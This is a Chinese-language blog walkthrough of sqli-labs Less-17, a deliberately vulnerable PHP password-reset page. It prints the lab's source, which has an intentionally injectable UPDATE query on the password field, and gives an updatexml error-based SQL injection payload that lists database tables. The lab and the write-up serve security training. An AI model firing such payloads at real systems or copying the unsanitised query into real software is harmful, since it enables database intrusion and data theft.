sql-labs:less-17
阿新 • • 發佈:2021-09-04
輸錯密碼,就來這一套
進行程式碼審計
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Less-17 Update Query- Error based - String</title> </head> <body bgcolor="#000000"> <div style=" margin-top:20px;color:#FFF; font-size:24px; text-align:center"><font color="#FFFF00"> [PASSWORD RESET] </br></font> <font color="#FF0000"> Dhakkan </font><br></div> <div align="center" style="margin:20px 0px 0px 520px;border:20px; background-color:#0CF; text-align:center; width:400px; height:150px;"> <div style="padding-top:10px; font-size:15px;"> <!--Form to post the contents --> <form action="" name="form1" method="post"> <div style="margin-top:15px; height:30px;">User Name : <input type="text" name="uname" value=""/> </div> <div> New Password : <input type="text" name="passwd" value=""/></div></br> <div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div> </form> </div> </div> <div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center"> <font size="6" color="#FFFF00"> <?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); error_reporting(0); function check_input($value) { if(!empty($value)) { // truncation (see comments) $value = substr($value,0,15); } // Stripslashes if magic quotes enabled if (get_magic_quotes_gpc()) { $value = stripslashes($value); } // Quote if not a number if (!ctype_digit($value)) { $value = "'" . mysql_real_escape_string($value) . "'"; } else { $value = intval($value); } return $value; } // take the variables if(isset($_POST['uname']) && isset($_POST['passwd'])) { //making sure uname is not injectable $uname=check_input($_POST['uname']); $passwd=$_POST['passwd']; //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a'); fwrite($fp,'User Name:'.$uname."\n"); fwrite($fp,'New Password:'.$passwd."\n"); fclose($fp); // connectivity @$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result); //echo $row; if($row) { //echo '<font color= "#0000ff">'; $row1 = $row['username']; //echo 'Your Login name:'. $row1; $update="UPDATE users SET password = '$passwd' WHERE username='$row1'"; mysql_query($update); echo "<br>"; if (mysql_error()) { echo '<font color= "#FFFF00" font size = 3 >'; print_r(mysql_error()); echo "</br></br>"; echo "</font>"; } else { echo '<font color= "#FFFF00" font size = 3 >'; //echo " You password has been successfully updated " ; echo "<br>"; echo "</font>"; } echo '<img src="../images/flag1.jpg" />'; //echo 'Your Password:' .$row['password']; echo "</font>"; } else { echo '<font size="4.5" color="#FFFF00">'; //echo "Bug off you Silly Dumb hacker"; echo "</br>"; echo '<img src="../images/slap1.jpg" />'; echo "</font>"; } } ?> </font> </div> </body> </html>
下面有幾個關鍵的程式碼需要認識:
function check_input($value) //過濾使用者名稱的輸入 { if(!empty($value)) { // truncation (see comments) $value = substr($value,0,15); //擷取前面15個字串 } // Stripslashes if magic quotes enabled if (get_magic_quotes_gpc()) //檢視魔術符號是否開啟,開啟就返回 1 即magic_quotes_gpc=On { $value = stripslashes($value); //刪除由addslashes()新增的反斜槓 } // Quote if not a number if (!ctype_digit($value)) //判斷是不是數字,是數字就返回true { $value = "'" . mysql_real_escape_string($value) . "'"; //轉義字串 } else { $value = intval($value); //轉換為整形 } return $value; }
總之,經過一系列的過濾,想要在username上面下功夫是不可能的了,只能通過password進行注入
@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result); //echo $row; if($row) { //echo '<font color= "#0000ff">'; $row1 = $row['username']; //echo 'Your Login name:'. $row1; $update="UPDATE users SET password = '$passwd' WHERE username='$row1'"; mysql_query($update); echo "<br>";
這就是查詢的原始碼,可以通過passwd下文章
這由於是修改密碼的模組,直接輸入admin即可成功修改,但是我們要查詢資料庫等資訊,就需要使用xml報錯注入:
下面是爆表的例子,payload不過多闡述了
' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()
),0x7e),1)##
本文來自部落格園,作者:{Zeker62},轉載請註明原文連結:https://www.cnblogs.com/Zeker62/p/15225993.html